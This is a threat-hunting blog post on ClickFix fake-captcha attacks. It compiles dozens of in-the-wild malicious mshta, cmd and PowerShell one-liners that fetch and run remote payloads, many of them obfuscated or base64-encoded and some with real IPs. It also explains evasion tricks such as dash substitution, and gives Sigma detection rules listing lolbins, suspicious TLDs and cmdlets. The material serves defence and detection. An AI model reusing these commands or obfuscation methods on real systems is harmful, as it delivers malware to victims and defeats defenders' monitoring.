Targeting ClickFix - ShroudCloud

_Published: 6/11/2025_ ## Intro [ClickFix](https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape) (FakeCaptcha) has rapidly become the latest and greatest social engineering tactic which tricks end users to detonate malicious commands and pull down payloads. The name for the technique was coined by [proofpoint](https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn) back in June of last year. While it didn't start out as this simple, a compromised site has an injected snippet which delivers a fake captcha prompt to prove the end user is not a bot. This instructs the end user to press `Windows Key + R`, which opens the run dialog box. The user's clipboard is injected into via JavaScript, which contains the malicious command (powershell | cmd | mshta). Pressing `Control + V` and enter as instructed instantly detonates the command via that run dialog box. Since then, threat actors have hopped on the ClickFix train given the simplicity and high rate of success, resulting in a wide variety of distributions such as ClearFake, KongTuke, Lumma Stealer, Emmenhtal, etc. Security vendors have largely been playing a game of cat and mouse trying to catch the various ways that threat actors are evading detections through trivial command line obfuscation. ## Command Line Observations > Commands are compiled below for easy reference. > > Here are some of the example commands spotted in the wild: #### mshta ```python "C:\Windows\system32\mshta.exe" https://captcha-domain.things/1.mp3 # ✔ I am not a robot - reCAPTCHA Verification ID: 2165 "C:\WINDOWS\system32\mshta.exe" https://check.domain.icu/gkcxv.google?i=009f49d2-1a0c-4b84-bf2e-9ffe1148073c # ''I am not a 'robot' - гeСАРТСНА Verification ID: 8398'' "C:\WINDOWS\system32\mshta.exe" https://check.domain.icu/gkcxv.google?i=49ae2e5e-9056-4af9-8477-35ac6fbc25e6 # Humаn, nоt а rоbоt: CAPTCHА Vеrіfісаtіоn ID: 421966'' "C:\WINDOWS\system32\mshta.exe" https://check.domain.icu/gkcxv.google?i=77d76b77-8f3b-473e-a9e4-b0532d58c903 # ''I am not a robot - САРТСНА Verification ID:701211'' "C:\WINDOWS\system32\mshta.exe" http://ok.domain.us/ # "Authentication needed: Secure Code 3V8MUR-9PW4S" ``` #### cmd ```python "C:\WINDOWS\system32\cmd.exe" /c start /min powershell -Command "curl.exe -s 'http://domain.live/cd/' -o (Join-Path $env:TEMP 'd.js'); Start-Process (Join-Path $env:TEMP 'd.js')" # ✔ ''Cloud Identificator: 3261'' "C:\WINDOWS\system32\cmd.exe" /c "curl -s https://domain.pw/softly.bat -o C:\Users\username\AppData\Local\Temp\1\\p.bat && start /b C:\Users\username\AppData\Local\Temp\1\\p.bat &&" echo 🛡️ Human Detected — Firewall Guardian Code: 6274848 "C:\WINDOWS\system32\cmd.exe" cmd /c curl.exe -k -Ss -X POST "https://domain.top/www/sss.php" -o "C:\Users\Public\dysm.bat" && start /min "" "C:\Users\Public\dysm.bat" Please Enter or OK button ``` #### powershell ```python "C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w 1 irm https://www.domain.info|iex "C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" "irm https://domain.ly/fidowindows | iex" "C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w H -c "$s='irm domain.live/nlOs24YoL';iex ([string]::Join('|', $s, 'iex'))" "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$s='xif/pot.maldomain//:sptth';$r=$s[-1..-$s.Length]-join'';iex(iwr $r -UseBasicParsing)"" "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" /nOPR"o" ―W h -c "$url = 'd"om"a"in".com';$s"cr"i"pt" = I"nv"oke-"RestM"et"hod" -"Ur"i $url;I"n"vok"e-"Ex"p"re"ss"ion $scr"ip"t" "C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "iex $(irm 162.55.47.21:8080/$($z = [datetime]::UtcNow; $y = ([datetime]('01/01/' + '1970')); $x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))" "C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h $s=@(104,116,116,112,58,47,47,122,57,56,49,50,51,46,116,111,112,47,49,50);$a=New-Object System.Xml.XmlDocument;$a.Load([System.Text.Encoding]::ASCII.GetString($s));$a.command.t.rtd|iex "C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" $n='mNWU#ieS:old/CnTxHPE';$qH='.t';$g=$N+$qH;$DD='XsIKzrO';$H=$dd+$G;$o=$H[24]+$g[21]+$G[15]+'P'+$h[1]+$g[8]+$G[12]+'/cI'+$g[15]+$H[2]+'zEnDO'+$H[7]+'.SKi'+$n[1]+'/f516180c';$K='iR'+$H[7]; $gL=$G[5]+$g[19]+$DD[0]; &$gL(&$K $o);.' "C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -NoP -c "$a='api';$b='oofse';$c='icu';$u=[string]::join('',[char[]](104,116,116,112,115,58,47,47)+$a+$b+'.'+$c+'/fix');$s='i'+'e'+'x';$r='i'+'w'+'r';$p='-Us'+'eBa'+'sicP'+'arsing';$z=$s+'('+$r+' '+$u+' '+$p+')'"|iex #Confirmation number - 1543 "C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -NoP -c "$a='api';$b='klrdgd';$c='icu';$u=[string]::join('',[char[]](104,116,116,112,115,58,47,47)+$a+$b+'.'+$c+'/fix');$s='i'+'e'+'x';$r='i'+'w'+'r';$p='-Us'+'eBa'+'sicP'+'arsing';$z=$s+'('+$r+' '+$u+' '+$p+')'"|iex #Confirmation number - 154 "C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w 1 -C "$g=''; @(19,28,23,-54,18,30,30,26,29,-28,-39,-39,11,19,25,29,28,19,16,-40,13,25,23,38,19,15,34)|%{$g+=[char]($_+86)};.(gcm ?ex)($g)" "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w 1 -C "$of=''; @(17,26,21,-56,16,28,28,24,27,-30,-41,-41,9,17,23,27,26,17,14,-42,11,23,21,36,17,13,32)|%{$of+=[char]($_+88)};.(gcm i?x)($of)" "C:\windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -C "$u='htps://domain.live/';$i=New-Object -ComObject('indowsInstaller.Installer'.Insert(0,'W'));$i.UILevel=2;$i.InstallProduct($(if($u.StartsWith('htps://')){$u.Insert(2,'t')}else{$u}),'')"; Service connection checkup : 9167 "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -C "$u='htps://domain.live/';$i=New-Object -ComObject('indowsInstaller.Installer'.Insert(0,'W'));$i.UILevel=2;$i.InstallProduct($(if($u.StartsWith('htps://')){$u.Insert(2,'t')}else{$u}),'')"; Service connection checkup : 8290 "C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -C "$i = New-Object -ComObject ('WindowsInstaljer.Installer'.Replace('j','l')); $i.UILevel = 2; $i.('InstaljProduct'.Replace('j','l'))(('htdos://domain.live/'.Replace('do','tp')),'')"; Service connection checkup : 6071 "C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -C "$i = New-Object -ComObject ('WindowsInstaljer.Installer'.Replace('j','l')); $i.UILevel = 2; $i.('InstaljProduct'.Replace('j','l'))(('htdos://domain.live/'.Replace('do','tp')),'')"; Service connection checkup : 7712 "C:\windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -C "$u='htps://domain.live/';$i=New-Object -ComObject('indowsInstaller.Installer'.Insert(0,'W'));$i.UILevel=2;$i.InstallProduct($(if($u.StartsWith('htps://')){$u.Insert(2,'t')}else{$u}),'')"; Service connection checkup : 1910 "C:\windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -C "$u='htps://domain.live/';$i=New-Object -ComObject('indowsInstaller.Installer'.Insert(0,'W'));$i.UILevel=2;$i.InstallProduct($(if($u.StartsWith('htps://')){$u.Insert(2,'t')}else{$u}),'')"; Service connection checkup : 3445 "C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -NoP -W HiDdEn -ExecutionPolicy Bypass -C "$u=('h'+'ttp://77.110.'+'118.130/eee.txt');IEX((IWr -UseBasicParsing -Uri $u).Content)" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly91aWtrLmFuaW1hbGlhb3Fpc3NvLmNvbS9pZnplZnNocnd3Z3BoZA=='));IEX $w.DownloadString($u)" "C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w H -c "$s='irm domain.org/nlOs24YoL';iex ([string]::Join('|', $s, 'iex'))" "C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w H -c "$s='irm domain.org/u4tr3ibjal';iex ([string]::Join('|', $s, 'iex'))" "C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w H -c "$s='irm subdomain.trycloudflare.com/u4tr3ibjal';iex ([string]::Join('|', $s, 'iex'))" "C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w H -c "$s='irm subdomain.trycloudflare.com/u4tr3ibjal';iex ([string]::Join('|', $s, 'iex'))" "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -NoProfile -WindowStyle Hidden -Command "iex (new-object Net.WebClient).'DownloadString'('http://181.174.100.100/transform')" "C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w 1 -C "$l='https://domain.online/gillikombugona.m4a';Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine=('ms' + 'hta' + '.exe '+$l)}" # ✅ ''I am not a robot: CAPTCHA Verification UID: 7811'' "C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w 1 & \W*\\\\\\\\\\\\\\\\\\S*2\\\\\\\\\\\\\\\\\m*ht*e https://domain.shop/payload.m4a # ✅ ''I am not a robot: Cloudflare Verification ID: 439121'' "C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "& ([scriptblock]::Create((irm settings-domain.live/siglost)))" "C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -N"OPr"O —w h –C "$v"jl"ea = 'r"ed"ac"t"ed"000"00"70n[.]inf"o'; $p"h"blnm = Invo"k"e-R"e"st"Me"tho"d" -U"r"i $vj"le"a; I"nv"o"ke"-E"x"pression $phblnm" ``` ### encoded powershell ```python powershell -WinD H -enc bQBZAGgAdABhACAAIgFOAHQAbQAwAVAC8AcgBLbAHAAbWByAHQAMwUAAGIALGOSjAGQAbgAUg4AZQBOAC8AbYAGEAMQAoACIA= "C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ec JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABpAHIAbQAgACcAaAB0AHQAcABzADoALwAvAHAAbAB1AHMALQBwAGEAdgBlAGwALgBjAG8AbQAvAGYALwB0AC8ASwBtADYAOABDAEUASgBYAC4AagBwAGcAJwApACkAKQA= "C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" /ep bypass /e JABiAD0AKABOAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABzACcAKwAnAGUAZQAuAGkAbwAvADcAbQAnACsAJwAyAHkAaAB4ACcAKQA7AGkAZQBYACAAJABiADsA /W 1 ``` ## Drawing Parallels You may have picked up on a few themes already, but the main overlaps are the use of common keywords, emoticons, Cyrillic character embeddings, less than credible top-level domains, and behaviors such as invoke expression, invoke rest method, curl, etc. Both `cmd.exe` and `mshta.exe` alike have significantly less short-hand interpretations compared to powershell, which seemingly has endless methods of obfuscation. For instance, encoding can be invoked by `-e`, `-en`, `-enc`, `-eC`. It can set single character variables, add arbitrary strings such as `"RestM"et"hod`, `Invoke-WebRequest` can become shorthand `iR`, etc. That said, `mshta.exe` and `cmd.exe` are easy to nail down from a few angles, while powershell obfuscation becomes a rabbit hole of a topic. As the obfuscation and behavior evolved over the past several months, so have our methods of flagging this behavior. **Keyword overlap**: - captcha - human - robot - authentication - verification - secure code - service connection - confirmation number Why not just flag on keywords? Unfortunately, this is easily bypassed, and characters are often swapped with Cyrillic characters. **TLD overlap**: - .shop - .live - .pw - .info - .icu - .top > Note: These are not the only abused TLDs. More costly TLDs such as `.net` and `.com` are abused as well as the highly suspect TLDs such as `.top` **Behaviors**: - Curl - Invoke-RestMethod | irm | iR - Invoke-Expressiom | iex - Invoke-WebRequest | iwr - Single character variables - Net.WebClient - .`Replace` for obfuscation - Excess of characters for obfuscation (`'`,`"`,`*`,`\`) - Cyrillic character injection ## Mapping via Canvas > Here's a basic canvas mapping out infections from the fakecaptcha delivery to the run dialog box to the subsequent commands. The green rectangle maps out coverage with some of the rules provided below. ![[fakecaptcha_canvas.png]] Sometimes the KISS method is most appropriate with detections like these. There is no shortage of crazy pivots that could be made, but sometimes the simplest ideas are the most fitting. I should also point out that there are plenty of follow-on ideas that could hit the later stages of the infections, but these detections outlined below are centered around the ClickFix technique / initial execution. Later stages such as SOCKS proxy behavior from NodeJS, deployment of NetSupport, chained interpreters, etc are not covered in this post. ## Detection Opportunities ### Detection 1: Kitchen Sink - Suspicious DNS Request > Here we have abused lolbins, and we simply check to see that they are not beaconing out to suspicious TLDs. ```yaml title: Kitchen Sink - Suspicious DNS Request id: 9abfcdeb-f678-7904-e2f5-426614174015 description: "Detects DNS requests from high-risk processes (e.g., cmd.exe, powershell.exe) to suspicious tlds (e.g., .top, .icu, .xyz) or domains (e.g., trycloudflare), indicating potential c2 communication" status: experimental author: b date: 2025/05/20 logsource: category: dns product: windows detection: selection_process: Image|endswith: - '\cmd.exe' - '\wscript.exe' - '\cscript.exe' - '\rundll32.exe' - '\regsvr32.exe' - '\mshta.exe' - '\powershell.exe' - '\pwsh.exe' - '\powershell_ise.exe' - '\msiexec.exe' selection_dns_tld: dns.request|re: - '.*\\.ar - '.*\\.b2 - '.*\\.boats - '.*\\.buzz - '.*\\.cc - '.*\\.cf - '.*\\.cfd - '.*\\.click - '.*\\.club - '.*\\.digital - '.*\\.ga - '.*\\.gq - '.*\\.hair - '.*\\.icu - '.*\\.info - '.*\\.life - '.*\\.live - '.*\\.lol - '.*\\.makeup - '.*\\.ml - '.*\\.monster - '.*\\.motorcycles - '.*\\.online - '.*\\.pics - '.*\\.pw - '.*\\.ru - '.*\\.run - '.*\\.sbs - '.*\\.shop - '.*\\.site - '.*\\.skin - '.*\\.tn - '.*\\.tk - '.*\\.today - '.*\\.tmp - '.*\\.top - '.*\\.vip - '.*\\.win - '.*\\.xyz selection_dns_domain: dns.request|contains: - 'bashupload' - 'paste' - 'station307' - 'steam' - 'trycloudflare' condition: selection_process and (selection_dns_tld or selection_dns_domain) fields: - Image - dns.request falsepositives: - legitimate scripts accessing benign domains with suspicious tlds - third-party tools using similar processes level: high tags: - attack.command_and_control - attack.t1071 ``` ### Detection 2: Script Execution via Explorer > Rule was designed to catch the exact behavior outlined the canvas, from the parent process `explorer.exe` to the child processes such as `cmd.exe`, `powershell.exe`, or `mshta.exe`. > Update: Among the various different patterns and obfuscation methods, I discovered that PowerShell interprets different forms of hyphens. Therefore any pattern with embedded hyphens were bypassed. In the last command (non-encoded PowerShell) provided above, they used both an Em dash (—) and an En dash (–) to break patterns such as `-C "

or `-w h`. To account for this, I added in command line filters searching for these unexpected dashes. ```yaml title: FakeCaptcha - Clipboard Injection id: 987fcdeb-12a3-4b56-89ef-426614174001 description: Detects suspicious command-line patterns in FakeCaptcha campaigns (e.g., ClearFake) where users are prompted to paste malicious shell commands via clipboard (Windows Key + R, Ctrl-V). status: experimental author: b date: 2025/05/20 logsource: category: process_creation product: windows detection: selection_base: ParentImage|endswith: '\explorer.exe' selection_mshta: Image|endswith: '\mshta.exe' CommandLine|contains|none: - 'start.hta' selection_cmdline_tools: Image|endswith: - '\cmd.exe' - '\powershell.exe' - '\powershell_ise.exe' - '\pwsh.exe' - '\conhost.exe' CommandLine|contains: # Core PowerShell cmdlets for web and execution - 'Invoke-WebRequest' - 'Invoke-Expression' - 'Invoke-RestMethod' - 'Net.WebClient' - 'DownloadString' - 'iex' - 'irm ' # File and clipboard operations - 'Set-Content' - 'Get-Content' - 'Set-Clipboard' - 'Get-Clipboard' - 'Expand-Archive' # Obfuscation and encoding techniques - '[scriptblock]::Create' - '[string]::join(' - '[Array]::Reverse( - ';-join' - '[char[]](' - '.SubString(' # Command-line flags for obfuscation - '-c " - '-w h' # Hidden window - '-wind h' # Hidden window (variant) - ' -e ' # Encoded command - ' /e ' - ' -en ' - ' /en ' - '-enc' - '/enc' - '-ec ' # Additional tools for network or data transfer - 'curl' - 'Net.Sockets.TCPClient' - '–' - '—' filter_exclusions: CommandLine|contains: - '\Local\Microsoft\OneDrive\' - '\HP\' condition: selection_base and (selection_mshta or selection_cmdline_tools) and not filter_exclusions fields: - ParentImage - Image - CommandLine falsepositives: - Legitimate PowerShell scripts using similar cmdlets in administrative tasks - Third-party software installers using curl or clipboard operations level: high tags: - attack.execution - attack.t1059.001 - attack.t1059.003 ``` ### Detection 3: Anomalous MSHTA Usage > Rule was designed to catch a variety of behavior with `mshta.exe`, including the execution without expected extensions (.hta / .bat), interpreter chaining where it spawns shell sessions, or suspicious strings within the command line. ```yaml title: Anomalous MSHTA Usage id: 21532220-adb7-40ba-b0f3-5493212387a3 description: Triggers when mshta.exe exhibits suspicious behavior, such as executions without .html, .hta, or .bat extensions, from Downloads or archive folders, or spawning cmd.exe, powershell.exe, etc. status: stable author: b date: 2025/02/18 modified: 2025/05/08 logsource: product: windows category: process_creation detection: selection_mshta: ProcessName|endswith: '\mshta.exe' CommandLine|contains: - '\Downloads\' - '\Temp\7z' - '\Temp\Rar - '\Temp\Temp?_' - '\Temp\BNZ.' - 'GetObject' - 'WScript.Shell' - '.run(' - ').Exec(' - 'mshtml' - 'StrReverse' - '.RegWrite' - 'window.close(' - ' Chr(' - 'http' filter_mshta: CommandLine|contains: - '.html' - '.hta' - '.bat' selection_spawn: ParentProcessName|endswith: '\mshta.exe' ProcessName|endswith: - '\cmd.exe' - '\powershell.exe' - '\rundll32.exe' - '\regsvr32.exe' - '\cscript.exe' - '\wscript.exe' filter_spawn: CommandLine|contains: - '\HP\' - 'printui.dll' condition: (selection_mshta and not filter_mshta) or (selection_spawn and not filter_spawn) fields: - ProcessName - CommandLine - ParentProcessName level: high tags: - attack.execution ``` ## Conclusion There are plenty of different angles to alert on this behavior. From my observations, the **kitchen sink** and the **clipboard inject** rules have yielded the most results, catching an upwards of a dozen true positives while minimizing false positives. For reasons earlier described with obfuscation, there is always a risk of evasion. Therefore applying a grouping of rules to catch it from different angles is advised. If you're lucky enough to have events with **RunMRU** registry keys, you are positioned in an even better spot. Hope this helps and happy hunting!